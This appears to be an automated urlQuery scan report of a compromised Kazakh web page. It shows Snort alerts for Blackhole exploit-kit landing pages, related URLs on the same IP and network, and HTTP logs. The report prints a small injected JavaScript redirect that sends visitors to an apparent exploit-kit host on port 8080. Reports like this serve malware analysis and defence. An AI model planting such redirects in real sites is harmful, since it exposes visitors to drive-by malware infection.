Overview

URLhttp://www.uralcar.kz/forwarding.htm
IP92.46.52.73
ASNAS9198 JSC Kazakhtelecom
Location Kazakhstan
Report completed2012-11-10 02:46:36 CET
StatusLoading report..
urlQuery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-10 02:46:02 92.46.52.73 urlQuery Client1EXPLOIT-KIT Blackholev2 landing page download attempt
2012-11-10 02:46:02 92.46.52.73 urlQuery Client1EXPLOIT-KIT Blackhole landing page download attempt


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 92.46.52.73

Date Alerts / IDS URL IP
2012-12-15 04:44:390 / 2http://fnt.kz/mail.htm92.46.52.73
2012-12-12 17:32:390 / 3http://fnt.kz/mail.htm92.46.52.73
2012-12-10 03:07:341 / 4http://import.e-vesti.kz/page4.htm92.46.52.73
2012-11-17 10:33:270 / 2http://atest.kz/page8.htm92.46.52.73
2012-11-17 05:24:200 / 2http://atest.kz/page8.htm92.46.52.73
2012-11-16 08:07:270 / 2http://uralcar.kz/forwarding.htm92.46.52.73

Last 6 reports on ASN: AS9198 JSC Kazakhtelecom

Date Alerts / IDS URL IP
2013-03-24 13:50:341 / 1http://forum.profinance.kz/rating.htm95.57.119.115
2013-03-24 10:12:422 / 3http://edu.shygysdaryny.kz/92.46.52.62
2013-03-24 05:16:380 / 3http://rashid.idhost.kz/92.46.52.76
2013-03-23 22:19:401 / 1http://forum.profinance.kz/rating.htm95.57.119.115
2013-03-23 14:52:012 / 3http://edu.shygysdaryny.kz/index.php?cal_m=592.46.52.62
2013-03-23 14:10:132 / 3http://edu.shygysdaryny.kz/index.php?cal_m=792.46.52.62



JavaScript

Executed Scripts (1)


Executed Evals (1)

#1 JavaScript::Eval (size: 112, repeated: 1) 

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://canadianpanakota.ru:8080/forum/links/column.php";
}

Executed Writes (0)



HTTP Transactions (6)


Request Response 
GET /forwarding.htm HTTP/1.1

Host: www.uralcar.kz

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Sat, 10 Nov 2012 01:46:02 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Last-Modified: Sat, 10 Nov 2012 01:44:19 GMT
Etag: "30218d6-509-34e902c0"
Accept-Ranges: bytes
Content-Length: 1289
Cache-Control: max-age=1209600
Expires: Sat, 24 Nov 2012 01:46:02 GMT
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: www.uralcar.kz

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Sat, 10 Nov 2012 01:46:03 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Content-Length: 45
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
GET /forum/links/column.php HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.uralcar.kz/forwarding.htm
 
HTTP/1.1 502 Bad Gateway

Content-Type: text/html; charset=CP-1251

Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:15 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:16 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244
GET /favicon.ico HTTP/1.1

Host: www.uralcar.kz

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1

Date: Sat, 10 Nov 2012 01:46:06 GMT
Server: Apache/2.0.52 (Red Hat) PHP/5.2.17 FrontPage/5.0.2.2635
Content-Length: 45
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
GET /favicon.ico HTTP/1.1

Host: canadianpanakota.ru:8080

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8

Server: nginx/1.0.10
Date: Sat, 10 Nov 2012 10:08:17 GMT
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 244